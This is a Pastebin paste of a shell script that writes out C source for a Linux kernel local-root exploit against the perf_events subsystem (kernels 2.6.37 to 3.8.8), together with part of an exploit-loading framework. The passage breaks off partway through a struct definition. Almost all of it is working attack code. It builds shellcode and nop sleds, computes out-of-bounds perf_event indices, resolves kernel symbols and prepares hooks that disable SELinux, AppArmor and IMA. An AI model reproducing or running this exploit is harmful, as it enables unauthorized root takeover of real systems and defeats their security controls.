rom4eg9996669

run.sh

Apr 23rd, 2015
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 65.58 KB | None | 0 0
  1. #!/bin/sh
  2. # original exploit by sd@fucksheep.org, written in 2010
  3. # heavily modified by spender to do things and stuff
  4. # edited by Pashkela for RDOT.ORG 02.06.2013
  5. cat > exp_abacus.c <<_EOF
  6. /*
  7.  * original exploit by sd@fucksheep.org, written in 2010
  8.  * heavily modified by spender to do things and stuff
  9.  */
  10.  
  11. #define _GNU_SOURCE 1
  12. #include <stdint.h>
  13. #include <stdio.h>
  14. #include <stdlib.h>
  15. #include <string.h>
  16. #include <unistd.h>
  17. #include <sys/mman.h>
  18. #include <syscall.h>
  19. #include <stdint.h>
  20. #include <sys/utsname.h>
  21. #include <fcntl.h>
  22. #include <assert.h>
  23.  
  24. #define BIT64   (sizeof(unsigned long) != sizeof(unsigned int))
  25.  
  26. #define STRAIGHT_UP_EXECUTION_AT_NULL 0x31337
  27.  /* for overflows */
  28. #define EXIT_KERNEL_TO_NULL 0x31336
  29.  
  30. #define EXECUTE_AT_NONZERO_OFFSET 0xfffff000 // OR the offset with this
  31.  
  32. /* defines for post_exploit */
  33. #define RUN_ROOTSHELL 0x5150
  34. #define CHMOD_SHELL 0x5151
  35. #define FUNNY_PIC_AND_ROOTSHELL 0xdeadc01d
  36.  
  37. typedef unsigned long (*_get_kernel_sym)(char *name);
  38. typedef unsigned long __attribute__((regparm(3))) (*_kallsyms_lookup_name)(char *name);
  39.  
  40. struct exploit_state {
  41.     _get_kernel_sym get_kernel_sym;
  42.     _kallsyms_lookup_name kallsyms_lookup_name;
  43.     void *own_the_kernel;
  44.     void *exit_kernel;
  45.     char *exit_stack;
  46.     int run_from_main;
  47.     int got_ring0;
  48.     int got_root;
  49. };
  50.  
  51. #define EFL_RESERVED1 (1 << 1)
  52. #define EFL_PARITY (1 << 2)
  53. #define EFL_ZEROFLAG (1 << 6)
  54. #define EFL_INTERRUPTENABLE (1 << 9)
  55. #define EFL_IOPL3 ((1 << 12) | (1 << 13))
  56.  
  57. #define USER_EFLAGS (EFL_RESERVED1 | EFL_PARITY | EFL_ZEROFLAG | EFL_INTERRUPTENABLE)
  58. /* for insta-iopl 3, for whatever reason!
  59.    #define USER_EFLAGS (EFL_RESERVED1 | EFL_PARITY | EFL_ZEROFLAG | EFL_INTERRUPTENABLE | EFL_IOPL3)
  60. */
  61.  
  62. #define DISABLED_LSM        0x1
  63. #define DISABLED_IMA        0x2
  64. #define DISABLED_APPARMOR   0x4
  65. #define DISABLED_SELINUX    0x8
  66.  
  67.  
  68. struct exploit_state *exp_state;
  69. int is_old_kernel = 0;
  70.  
  71. char *desc = "Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root";
  72.  
  73. int requires_null_page = 0;
  74.  
  75. #define JMPLABELBASE64 0x1780000000
  76. #define JMPLABELBASE32 0x1a00000
  77. #define JMPLABELBASE (BIT64 ? JMPLABELBASE64 : JMPLABELBASE32)
  78. #define JMPLABELNOMODBASE64 0xd80000000
  79. #define JMPLABELNOMODBASE32 0x40000000
  80. #define JMPLABELNOMODBASE (BIT64 ? JMPLABELNOMODBASE64 : JMPLABELNOMODBASE32)
  81. #define BASE64  0x380000000
  82. #define BASE32  0x80000000
  83. #define BASE (BIT64 ? BASE64 : BASE32)
  84. #define SIZE64  0x010000000
  85. #define SIZE32  0x02000000
  86. #define SIZE (BIT64 ? SIZE64 : SIZE32)
  87. #define KSIZE  (BIT64 ? 0x2000000 : 0x2000)
  88. #define SYSCALL_NO (BIT64 ? 298 : 336)
  89. #define MAGICVAL (BIT64 ? 0x44444443 : 0x44444445)
  90.  
  91. static int wrap_val;
  92. static int structsize;
  93. static int has_jmplabel;
  94. static int is_unaligned;
  95. static int target_offset;
  96. static int computed_index;
  97. static unsigned long target_addr;
  98. static unsigned long array_base;
  99. unsigned long kbase;
  100.  
  101. struct {
  102.     uint16_t limit;
  103.     uint64_t addr;
  104. } __attribute__((packed)) idt;
  105.  
  106. int get_exploit_state_ptr(struct exploit_state *ptr)
  107. {
  108.     exp_state = ptr;
  109.     return 0;
  110. }
  111.  
  112. int ring0_cleanup(void)
  113. {
  114.     if (BIT64) {
  115.         *(unsigned int *)(target_addr + target_offset) = 0xffffffff;
  116.         /* clean up the probe effects for redhat tears */
  117.         (*(unsigned int *)(array_base - structsize))--;
  118.         (*(unsigned int *)(array_base - (2 * structsize)))--;
  119.     }
  120.     /* on 32bit we let the kernel clean up for us */
  121.     return 0;
  122. }
  123.  
  124. int main_pid;
  125. int signals_dont_work[2];
  126. int total_children;
  127.  
  128. static int send_event(uint32_t off) {
  129.     uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x320 };
  130.     int fd;
  131.  
  132.     if ((int)off >= 0) {
  133.         printf(" [-] Target is invalid, index is positive.\n");
  134.         exit(1);
  135.     }
  136.     if (getpid() == main_pid)
  137.         printf(" [+] Submitting index of %d to perf_event_open\n", (int)off);
  138.     fd = syscall(SYSCALL_NO, buf, 0, -1, -1, 0);
  139.  
  140.     if (fd < 0) {
  141.         printf(" [-] System rejected creation of perf event.\n");
  142.         exit(1);
  143.     }
  144.     if (BIT64)
  145.         close(fd);
  146.     return fd;
  147. }
  148.  
  149. //static unsigned long security_ops;
  150. static unsigned long perf_swevent_enabled;
  151. static unsigned long ptmx_fops;
  152.  
  153. int trigger(void)
  154. {
  155.     /* !SMEP version */
  156.     printf(" [!] Array base is %p\n", (void *)array_base);
  157.     printf(" [!] Detected structure size of %d bytes\n", structsize);
  158.     printf(" [!] Targeting %p\n", (void *)(array_base + (structsize * computed_index)));
  159.  
  160. #ifdef __x86_64__
  161.     send_event(computed_index);
  162.     if (is_unaligned) {
  163.         asm volatile (
  164.         "pushfq\n"
  165.         "orq \$0x40000, (%rsp)\n"
  166.         "popfq\n"
  167.         "test %rax, 0x1(%rsp)\n"
  168.         );
  169.     } else {
  170.         asm("int \$0x4");
  171.     }
  172. #else
  173.     {
  174.         unsigned long kbase_counter = 0;
  175.         int ret;
  176.         int fd;
  177.         int pipes[2];
  178.         int i;
  179.         char garbage;
  180.  
  181.         /* child notification/reaping code from zx2c4 */
  182.  
  183.         pipe(pipes);
  184.         pipe(signals_dont_work);
  185.  
  186.         main_pid = getpid();
  187.  
  188.         total_children = 0;
  189.  
  190.         while (kbase_counter < kbase) {
  191.             if (!fork()) {
  192.                 int x;
  193.                 for (x = 0; x < 512; x++)
  194.                     send_event(computed_index);
  195.                 write(pipes[1], &garbage, 1);
  196.                 read(signals_dont_work[0], &garbage, 1);
  197.                 _exit(0);
  198.             }
  199.             kbase_counter += 512;
  200.             total_children++;
  201.  
  202.         }
  203.         for (i = 0; i < total_children; i++)
  204.             read(pipes[0], &garbage, 1);
  205.  
  206.         fd = open("/dev/ptmx", O_RDWR);
  207.         if (fd < 0) {
  208.             printf(" [-] Unable to open /dev/ptmx\n");
  209.             exit(1);
  210.         }
  211.         {
  212.             struct iovec iov;
  213.             /* this choice is arbitrary */
  214.             iov.iov_base = &iov;
  215.             iov.iov_len = sizeof(iov);
  216.             /* this one is not ;) */
  217.             readv(fd, &iov, 1);
  218.         }
  219.     }
  220. #endif
  221.  
  222.     /* SMEP/SMAP version, shift security_ops */
  223.     //security_ops = (unsigned long)exp_state->get_kernel_sym("security_ops");
  224.     //for (i = 0; i < sizeof(unsigned long); i++)
  225.     //  send_event(-wrap_val + ((security_ops&0xffffffff)-0x80000000)/4, 1);
  226.     // add fancy trigger here
  227.  
  228.     return 0;
  229. }
  230.  
  231. int post(void)
  232. {
  233.     write(signals_dont_work[1], &total_children, total_children);
  234.     return RUN_ROOTSHELL;
  235. }
  236.  
  237. static int find_mod_in_mapping(unsigned int *mem, unsigned long len, int *idx)
  238. {
  239.     unsigned long i, x;
  240.  
  241.     for (i = 0; i < len/4; i++) {
  242.         if (mem[i] == MAGICVAL) {
  243.             for (x = 1; x < 7; x++) {
  244.                 if (mem[i+x] == MAGICVAL) {
  245.                     *idx = i;
  246.                     return 4 * x;
  247.                 }
  248.             }
  249.             break;
  250.         }
  251.     }
  252.     return 0;
  253. }
  254.  
  255. int prepare(unsigned char *buf)
  256. {
  257.     unsigned char *mem;
  258.     unsigned char *p;
  259.     int fd;
  260.     unsigned int *map1, *map2, *map3;
  261.     int i, x;
  262.     unsigned long idx;
  263.     char c;
  264.     int fd1, fd2;
  265.  
  266.     assert((map1 = mmap((void*)BASE, SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0,0)) == (void*)BASE);
  267.     memset(map1, 0x44, SIZE);
  268.     assert((map2 = mmap((void*)JMPLABELBASE, SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0,0)) == (void*)JMPLABELBASE);
  269.     memset(map2, 0x44, SIZE);
  270.     assert((map3 = mmap((void*)JMPLABELNOMODBASE, SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0,0)) == (void*)JMPLABELNOMODBASE);
  271.     memset(map3, 0x44, SIZE);
  272.     fd1 = send_event(BIT64 ? -1 : -(1024 * 1024 * 1024)/4);
  273.     fd2 = send_event(BIT64 ? -2 : -(1024 * 1024 * 1024)/4-1);
  274.  
  275.     structsize = find_mod_in_mapping(map1, SIZE, &i);
  276.     if (!structsize) {
  277.         structsize = find_mod_in_mapping(map2, SIZE, &i);
  278.         if (!structsize) {
  279.             structsize = find_mod_in_mapping(map3, SIZE, &i);
  280.             if (!structsize) {
  281.                 printf(" [-] Unsupported configuration.\n");
  282.                 if (!BIT64) {
  283.                     close(fd1);
  284.                     close(fd2);
  285.                 }
  286.                 exit(1);
  287.             } else
  288.                 has_jmplabel = 1;
  289.         } else
  290.             has_jmplabel = 1;
  291.     }
  292.  
  293.     /* permit the dec back */
  294.     if (!BIT64) {
  295.         close(fd1);
  296.         close(fd2);
  297.     }
  298.     wrap_val = 4 * i + 2 * structsize;
  299.  
  300.     if (BIT64) {
  301.         /* use masked kernel range here */
  302.         asm ("sidt %0" : "=m" (idt));
  303.         kbase = idt.addr & 0xff000000;
  304.         target_addr = idt.addr;
  305.         array_base = 0xffffffff80000000UL | wrap_val;
  306.  
  307.         /* do we need to target AC instead? */
  308.         if (has_jmplabel) {
  309.             if  ((array_base - target_addr) % structsize) {
  310.                 is_unaligned = 1;
  311.                 target_offset = 0x118;
  312.             } else
  313.                 target_offset = 0x48;
  314.         } else
  315.             target_offset = 0x48;
  316.  
  317.         computed_index = -((array_base-target_addr-target_offset)/structsize);
  318.     } else {
  319.         int brute;
  320.  
  321.         /* use just above mmap_min_addr here */
  322.         kbase = 0;
  323.         while (1) {
  324.             mem = (unsigned char *)mmap((void *)kbase, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  325.             if (mem != MAP_FAILED) {
  326.                 munmap((void *)kbase, 0x1000);
  327.                 break;
  328.             } else
  329.                 kbase += 0x1000;
  330.         }
  331.         array_base = (unsigned long)exp_state->get_kernel_sym("perf_swevent_enabled");
  332.         target_addr = (unsigned long)exp_state->get_kernel_sym("ptmx_fops");
  333.         if (!target_addr || !array_base) {
  334.             printf(" [-] Symbols required for i386 exploitation (in this exploit).\n");
  335.             exit(1);
  336.         }
  337.         target_offset = 4 * sizeof(unsigned int);
  338.         computed_index = 0;
  339.         for (brute = -1; brute < 0; brute--) {
  340.             if (array_base + (brute * structsize) == (target_addr + target_offset)) {
  341.                 computed_index = brute;
  342.                 break;
  343.             }
  344.         }
  345.         if (!computed_index) {
  346.             printf(" [-] Unable to reach ptmx_fops target under this configuration.\n");
  347.             exit(1);
  348.         }
  349.     }
  350.  
  351.     /* elito hungarian technique */
  352.     fd = open("./suckit_selinux_nopz", O_CREAT | O_WRONLY, 0644);
  353.     if (fd < 0) {
  354.         printf("unable to create nop sled file\n");
  355.         exit(1);
  356.     }
  357.  
  358.     mem = (unsigned char *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  359.     if (mem == MAP_FAILED) {
  360.         printf("unable to mmap nop sled\n");
  361.         goto error;
  362.     }
  363.     memset(mem, 0x90, 0x1000);
  364.     write(fd, mem, 0x1000);
  365.     close(fd);
  366.     munmap(mem, 0x1000);
  367.  
  368.     fd = open("./suckit_selinux", O_CREAT | O_WRONLY, 0644);
  369.     if (fd < 0) {
  370.         printf("unable to create shellcode file\n");
  371.         exit(1);
  372.     }
  373.  
  374.     mem = (unsigned char *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  375.     if (mem == MAP_FAILED) {
  376.         printf("unable to mmap nop sled\n");
  377.         goto error;
  378.     }
  379.     memset(mem, 0x90, 0x1000);
  380.     p = (unsigned char *)(mem + 0x1000 - 3 - (2 * (2 + 4 + sizeof(unsigned long))));
  381.     if (BIT64) {
  382.         // swapgs
  383.         p[0] = 0x0f;
  384.         p[1] = 0x01;
  385.         p[2] = 0xf8;
  386.     }
  387.     p += 3;
  388.     // call own_the_kernel
  389.     p[0] = 0xff;
  390.     p[1] = 0x15;
  391.     *(unsigned int *)&p[2] = BIT64 ? 6 : kbase + KSIZE - (2 * sizeof(unsigned long));
  392.     // call exit_kernel
  393.     p[6] = 0xff;
  394.     p[7] = 0x25;
  395.     *(unsigned int *)&p[8] = BIT64 ? sizeof(unsigned long) : kbase + KSIZE - sizeof(unsigned long);
  396.     *(unsigned long *)&p[12] = (unsigned long)exp_state->own_the_kernel;
  397.     *(unsigned long *)&p[12 + sizeof(unsigned long)] = (unsigned long)exp_state->exit_kernel;
  398.  
  399.     write(fd, mem, 0x1000);
  400.     close(fd);
  401.     munmap(mem, 0x1000);
  402.  
  403.     fd = open("./suckit_selinux_nopz", O_RDONLY);
  404.     if (fd < 0) {
  405.         printf("unable to open nop sled file for reading\n");
  406.         goto error;
  407.     }
  408.     // map in nops and page them in
  409.     for (idx = 0; idx < (KSIZE/0x1000)-1; idx++) {
  410.         mem = (unsigned char *)mmap((void *)(kbase + idx * 0x1000), 0x1000, PROT_READ | PROT_EXEC, MAP_FIXED | MAP_PRIVATE, fd, 0);
  411.         if (mem != (unsigned char *)(kbase + idx * 0x1000)) {
  412.             printf("unable to mmap\n");
  413.             goto error;
  414.         }
  415.         if (!idx)
  416.             assert(!mlock(mem, 0x1000));
  417.         c = *(volatile char *)mem;
  418.     }
  419.  
  420.     fd = open("./suckit_selinux", O_RDONLY);
  421.     if (fd < 0) {
  422.         printf("unable to open shellcode file for reading\n");
  423.         goto error;
  424.     }
  425.     mem = (unsigned char *)mmap((void *)(kbase + KSIZE - 0x1000), 0x1000, PROT_READ | PROT_EXEC, MAP_FIXED | MAP_PRIVATE, fd, 0);
  426.     if (mem != (unsigned char *)(kbase + KSIZE - 0x1000)) {
  427.         printf("unable to mmap\n");
  428.         goto error;
  429.     }
  430.     assert(!mlock(mem, 0x1000));
  431.     c = *(volatile char *)mem;
  432.  
  433.     unlink("./suckit_selinux");
  434.     unlink("./suckit_selinux_nopz");
  435.  
  436.     return 0;
  437. error:
  438.     unlink("./suckit_selinux");
  439.     unlink("./suckit_selinux_nopz");
  440.     exit(1);
  441. }
  442. _EOF
  443. cat > exploit.c <<_EOF
  444. /* exploit lib */
  445.  
  446. #include <asm/unistd.h>
  447. #include <signal.h>
  448. #include <stdbool.h>
  449. #include <stddef.h>
  450. #include <stdint.h>
  451. #include <stdio.h>
  452. #include <stdlib.h>
  453. #include <string.h>
  454. #include <sys/file.h>
  455. #include <sys/mman.h>
  456. #include <sys/socket.h>
  457. #include <sys/types.h>
  458. #include <sys/user.h>
  459. #include <sys/stat.h>
  460. #include <sys/utsname.h>
  461. #include <sys/personality.h>
  462. #include <time.h>
  463. #include <unistd.h>
  464. #include <fnmatch.h>
  465. #include <dirent.h>
  466. #include <dlfcn.h>
  467. #include <grp.h>
  468. #ifdef HAVE_SELINUX
  469. #include <selinux/selinux.h>
  470. #include <selinux/context.h>
  471. #endif
  472.  
  473. #ifndef PATH_MAX
  474. #define PATH_MAX 4095
  475. #endif
  476.  
  477. /* defines for prepare_the_exploit */
  478.  /* for null fptr derefs */
  479. #define STRAIGHT_UP_EXECUTION_AT_NULL 0x31337
  480.  /* for overflows */
  481. #define EXIT_KERNEL_TO_NULL 0x31336
  482.  
  483. #define EXECUTE_AT_NONZERO_OFFSET 0xfffff000 // OR the offset with this
  484.  
  485. /* defines for post_exploit */
  486. #define RUN_ROOTSHELL 0x5150
  487. #define CHMOD_SHELL 0x5151
  488. #define FUNNY_PIC_AND_ROOTSHELL 0xdeadc01d
  489.  
  490. typedef unsigned long (*_get_kernel_sym)(char *name);
  491. typedef unsigned long __attribute__((regparm(3))) (*_kallsyms_lookup_name)(char *name);
  492.  
  493. struct exploit_state {
  494.     _get_kernel_sym get_kernel_sym;
  495.     _kallsyms_lookup_name kallsyms_lookup_name;
  496.     void *own_the_kernel;
  497.     void *exit_kernel;
  498.     char *exit_stack;
  499.     int run_from_main;
  500.     int got_ring0;
  501.     int got_root;
  502. };
  503.  
  504. #define EFL_RESERVED1 (1 << 1)
  505. #define EFL_PARITY (1 << 2)
  506. #define EFL_ZEROFLAG (1 << 6)
  507. #define EFL_INTERRUPTENABLE (1 << 9)
  508. #define EFL_IOPL3 ((1 << 12) | (1 << 13))
  509.  
  510. #define USER_EFLAGS (EFL_RESERVED1 | EFL_PARITY | EFL_ZEROFLAG | EFL_INTERRUPTENABLE)
  511. /* for insta-iopl 3, for whatever reason!
  512.    #define USER_EFLAGS (EFL_RESERVED1 | EFL_PARITY | EFL_ZEROFLAG | EFL_INTERRUPTENABLE | EFL_IOPL3)
  513. */
  514.  
  515. #define DISABLED_LSM        0x1
  516. #define DISABLED_IMA        0x2
  517. #define DISABLED_APPARMOR   0x4
  518. #define DISABLED_SELINUX    0x8
  519.  
  520.  
  521.  
  522. typedef int (*_prepare_for_exploit)(unsigned char *buf);
  523. typedef int (*_trigger_the_bug)(void);
  524. typedef int (*_post_exploit)(void);
  525. typedef int (*_ring0_cleanup)(void);
  526. typedef int (*_get_exploit_state_ptr)(struct exploit_state *exp_state);
  527.  
  528. #define MAX_EXPLOITS 32
  529.  
  530. struct exploit_module {
  531.     char desc[512];
  532.     _get_exploit_state_ptr get_exploit_state_ptr;
  533.     _prepare_for_exploit prep;
  534.     _trigger_the_bug trigger;
  535.     _post_exploit post;
  536.     _ring0_cleanup ring0_cleanup;
  537.     int requires_null_page;
  538.     int requires_symbols_to_trigger;
  539. } modules[MAX_EXPLOITS];
  540. int num_exploits = 0;
  541.  
  542. int check_entry(const struct dirent *dir)
  543. {
  544.     if (!fnmatch("exp_*.so", dir->d_name, 0))
  545.         return 1;
  546.     return 0;
  547. }
  548.  
  549. void add_exploit_modules(void)
  550. {
  551.     struct dirent **namelist;
  552.     void *mod;
  553.     void *desc, *prepare, *trigger, *post, *get_exp_state_ptr, *requires_null_page, *ring0_cleanup, *requires_symbols_to_trigger;
  554.     char tmpname[PATH_MAX];
  555.     int n;
  556.     int i;
  557.     n = scandir(".", &namelist, &check_entry, alphasort);
  558.     if (n < 0) {
  559.         fprintf(stdout, "No exploit modules found, exiting...\n");
  560.         exit(1);
  561.     }
  562.     for (i = 0; i < n; i++) {
  563.         snprintf(tmpname, sizeof(tmpname)-1, "./%s", namelist[i]->d_name);
  564.         tmpname[sizeof(tmpname)-1] = '\0';
  565.         mod = dlopen(tmpname, RTLD_NOW);
  566.         if (mod == NULL) {
  567. unable_to_load:
  568.             fprintf(stdout, "Unable to load %s\n", namelist[i]->d_name);
  569.             free(namelist[i]);
  570.             continue;
  571.         }
  572.         desc = dlsym(mod, "desc");
  573.         prepare = dlsym(mod, "prepare");
  574.         ring0_cleanup = dlsym(mod, "ring0_cleanup");
  575.         trigger = dlsym(mod, "trigger");
  576.         post = dlsym(mod, "post");
  577.         requires_null_page = dlsym(mod, "requires_null_page");
  578.         requires_symbols_to_trigger = dlsym(mod, "requires_symbols_to_trigger");
  579.         get_exp_state_ptr = dlsym(mod, "get_exploit_state_ptr");
  580.  
  581.         if (desc == NULL || prepare == NULL || trigger == NULL || post == NULL || get_exp_state_ptr == NULL || requires_null_page == NULL)
  582.             goto unable_to_load;
  583.  
  584. #ifdef NON_NULL_ONLY
  585.         if (*(int *)requires_null_page) {
  586.             free(namelist[i]);
  587.             continue;
  588.         }
  589. #else
  590.         if (!*(int *)requires_null_page) {
  591.             free(namelist[i]);
  592.             continue;
  593.         }
  594. #endif
  595.  
  596.         if (num_exploits >= MAX_EXPLOITS) {
  597.             fprintf(stdout, "Max exploits reached.\n");
  598.             return;
  599.         }
  600.         strncpy(modules[num_exploits].desc, *(char **)desc, sizeof(modules[num_exploits].desc) - 1);
  601.         modules[num_exploits].desc[sizeof(modules[num_exploits].desc)-1] = '\0';
  602.         modules[num_exploits].prep = (_prepare_for_exploit)prepare;
  603.         modules[num_exploits].trigger = (_trigger_the_bug)trigger;
  604.         modules[num_exploits].post = (_post_exploit)post;
  605.         modules[num_exploits].ring0_cleanup = (_ring0_cleanup)ring0_cleanup;
  606.         modules[num_exploits].get_exploit_state_ptr = (_get_exploit_state_ptr)get_exp_state_ptr;
  607.         modules[num_exploits].requires_null_page = *(int *)requires_null_page;
  608.         modules[num_exploits].requires_symbols_to_trigger = requires_symbols_to_trigger ? *(int *)requires_symbols_to_trigger : 0;
  609.         free(namelist[i]);
  610.         num_exploits++;
  611.     }
  612.  
  613.     return;
  614. }
  615.  
  616. struct exploit_state exp_state;
  617. int eightk_stack = 0;
  618. int twofourstyle = 0;
  619. int raised_caps = 0;
  620. unsigned long current_addr = 0;
  621. int cred_support = 0;
  622. int cred_offset = 0;
  623. int fs_offset = 0;
  624. int aio_read_offset = 0;
  625. int has_vserver = 0;
  626. int vserver_offset = 0;
  627. unsigned long init_cred_addr = 0;
  628. unsigned long default_exec_domain = 0;
  629.  
  630. #define TASK_RUNNING 0
  631.  
  632. #ifdef __x86_64__
  633. #define KERNEL_BASE 0xffffffff81000000UL
  634. #define KSTACK_MIN  0xffff800000000000UL
  635. #define KSTACK_MAX  0xfffffffff0000000UL
  636. #else
  637. #define KERNEL_BASE 0xc0000000UL
  638. #define KSTACK_MIN  0xc0000000UL
  639. #define KSTACK_MAX  0xfffff000UL
  640. #endif
  641.  
  642. char *exit_stack;
  643.  
  644. static inline unsigned long get_current_4k(void)
  645. {
  646.     unsigned long current = 0;
  647.     unsigned long exec_domain = 0;
  648.  
  649.     current = (unsigned long)&current;
  650.  
  651.     exec_domain = *(unsigned long *)((current & ~(0x1000 - 1)) + sizeof(unsigned long));
  652.     current = *(unsigned long *)(current & ~(0x1000 - 1));
  653.     if (current < KSTACK_MIN || current > KSTACK_MAX)
  654.         return 0;
  655.     if (exec_domain < KSTACK_MIN || exec_domain > KSTACK_MAX)
  656.         return 0;
  657.     if (default_exec_domain && exec_domain != default_exec_domain)
  658.         return 0;
  659.     if (*(long *)current != TASK_RUNNING)
  660.         return 0;
  661.  
  662.     return current;
  663. }
  664.  
  665. static inline unsigned long get_current_8k(void)
  666. {
  667.     unsigned long current = 0;
  668.     unsigned long exec_domain = 0;
  669.     unsigned long oldstyle = 0;
  670.  
  671.     eightk_stack = 1;
  672.  
  673.     current = (unsigned long)&current;
  674.     oldstyle = current & ~(0x2000 - 1);
  675.     current = *(unsigned long *)(oldstyle);
  676.     exec_domain = *(unsigned long *)(oldstyle + sizeof(unsigned long));
  677.  
  678.     twofourstyle = 1;
  679.     if (current < KSTACK_MIN || current > KSTACK_MAX)
  680.         return oldstyle;
  681.     if (exec_domain < KSTACK_MIN || exec_domain > KSTACK_MAX)
  682.         return oldstyle;
  683.     if (default_exec_domain && exec_domain != default_exec_domain)
  684.         return oldstyle;
  685.     if (*(long *)current != TASK_RUNNING)
  686.         return oldstyle;
  687.  
  688.     twofourstyle = 0;
  689.     return current;
  690. }
  691.  
  692. static int requires_symbols_to_trigger;
  693.  
  694. static int kallsyms_is_hidden;
  695.  
  696. static unsigned long get_kernel_sym(char *name)
  697. {
  698.     FILE *f;
  699.     unsigned long addr;
  700.     char dummy;
  701.     char sname[512];
  702.     struct utsname ver;
  703.     int ret;
  704.     int rep = 0;
  705.     int oldstyle = 0;
  706.  
  707.     if (kallsyms_is_hidden)
  708.         goto fallback;
  709.  
  710.     f = fopen("/proc/kallsyms", "r");
  711.     if (f == NULL) {
  712.         f = fopen("/proc/ksyms", "r");
  713.         if (f == NULL)
  714.             goto fallback;
  715.         oldstyle = 1;
  716.     }
  717.  
  718. repeat:
  719.     ret = 0;
  720.     while(ret != EOF) {
  721.         if (!oldstyle)
  722.             ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  723.         else {
  724.             ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
  725.             if (ret == 2) {
  726.                 char *p;
  727.                 if (strstr(sname, "_O/") || strstr(sname, "_S."))
  728.                     continue;
  729.                 p = strrchr(sname, '_');
  730.                 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
  731.                     p = p - 4;
  732.                     while (p > (char *)sname && *(p - 1) == '_')
  733.                         p--;
  734.                     *p = '\0';
  735.                 }
  736.             }
  737.         }
  738.         if (ret == 0) {
  739.             fscanf(f, "%s\n", sname);
  740.             continue;
  741.         }
  742.         if (!strcmp(name, sname) && addr) {
  743.             fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
  744.             fclose(f);
  745.             return addr;
  746.         } else if (!strcmp(name, sname)) {
  747.             kallsyms_is_hidden = 1;
  748.         }
  749.     }
  750.  
  751.     fclose(f);
  752.     if (rep == 2)
  753.         return 0;
  754.     else if (rep == 1)
  755.         goto fallback2;
  756. fallback:
  757.     /* didn't find the symbol, let's retry with the System.map
  758.        dedicated to the pointlessness of Russell Coker's SELinux
  759.        test machine (why does he keep upgrading the kernel if
  760.        "all necessary security can be provided by SE Linux"?)
  761.     */
  762.     uname(&ver);
  763.     if (!strncmp(ver.release, "2.4", 3) || !strncmp(ver.release, "2.2", 3))
  764.         oldstyle = 1;
  765.     sprintf(sname, "/boot/System.map-%s", ver.release);
  766.     f = fopen(sname, "r");
  767.     if (f == NULL)
  768.         goto fallback2;
  769.     rep = 1;
  770.     goto repeat;
  771. fallback2:
  772.     /* didn't find the symbol, let's retry with the System.map
  773.        dedicated to the pointlessness of Russell Coker's SELinux
  774.        test machine (why does he keep upgrading the kernel if
  775.        "all necessary security can be provided by SE Linux"?)
  776.     */
  777.     uname(&ver);
  778.     if (!strncmp(ver.release, "2.4", 3) || !strncmp(ver.release, "2.2", 3))
  779.         oldstyle = 1;
  780.     sprintf(sname, "./System.map-%s", ver.release);
  781.     f = fopen(sname, "r");
  782.     if (f == NULL) {
  783.         sprintf(sname, "./System.map");
  784.         f = fopen(sname, "r");
  785.         if (f == NULL) {
  786.             if (requires_symbols_to_trigger) {
  787.                 printf("Unable to acquire kernel symbols.  Copy the appropriate System.map to the current directory.\n");
  788.                 exit(1);
  789.             } else
  790.                 return 0;
  791.         }
  792.     }
  793.     rep = 2;
  794.     goto repeat;
  795. }
  796.  
  797. /* for switching from interrupt to process context */
  798. unsigned long *ptmx_fops;
  799.  
  800. /* check for xen support */
  801. unsigned long *xen_start_info;
  802. int xen_detected;
  803. int can_change_ptes;
  804.  
  805. /* check if DEBUG_RODATA only protects .rodata */
  806. unsigned long mark_rodata_ro;
  807. unsigned long set_kernel_text_ro;
  808.  
  809. int *audit_enabled;
  810. int *ima_audit;
  811.  
  812. int *selinux_enforcing;
  813. int *selinux_enabled;
  814. int *sel_enforce_ptr;
  815.  
  816. int *apparmor_enabled;
  817. int *apparmor_logsyscall;
  818. int *apparmor_audit;
  819. int *apparmor_complain;
  820.  
  821. unsigned long *init_task;
  822. unsigned long init_fs;
  823.  
  824. unsigned long *bad_file_ops;
  825. unsigned long bad_file_aio_read;
  826.  
  827. unsigned long vc_sock_stat;
  828.  
  829. unsigned char *ima_bprm_check;
  830. unsigned char *ima_file_mmap;
  831. unsigned char *ima_path_check;
  832. /* whoa look at us, 2.6.33 support before it's even released */
  833. unsigned char *ima_file_check;
  834.  
  835. unsigned long *security_ops;
  836. unsigned long default_security_ops;
  837.  
  838. unsigned long sel_read_enforce;
  839.  
  840. int what_we_do;
  841.  
  842. unsigned int our_uid;
  843.  
  844. typedef void __attribute__((regparm(3))) (* _set_fs_root)(unsigned long fs, unsigned long path);
  845. typedef void __attribute__((regparm(3))) (* _set_fs_pwd)(unsigned long fs, unsigned long path);
  846. typedef bool __attribute__((regparm(3))) (* _virt_addr_valid)(unsigned long addr);
  847.  
  848. typedef void __attribute__((regparm(3))) (* _prepare_ve0_process)(unsigned long tsk);
  849.  
  850. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
  851. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
  852.  
  853. typedef void __attribute__((regparm(3))) (* _make_lowmem_page_readonly)(unsigned long addr);
  854. typedef void __attribute__((regparm(3))) (* _make_lowmem_page_readwrite)(unsigned long addr);
  855.  
  856. _make_lowmem_page_readonly make_lowmem_page_readonly;
  857. _make_lowmem_page_readwrite make_lowmem_page_readwrite;
  858. _commit_creds commit_creds;
  859. _prepare_kernel_cred prepare_kernel_cred;
  860. _prepare_ve0_process prepare_ve0_process;
  861. _set_fs_root set_fs_root;
  862. _set_fs_pwd set_fs_pwd;
  863. _virt_addr_valid virt_addr_valid;
  864.  
  865. struct cred {
  866.     int usage; // must be >= 4
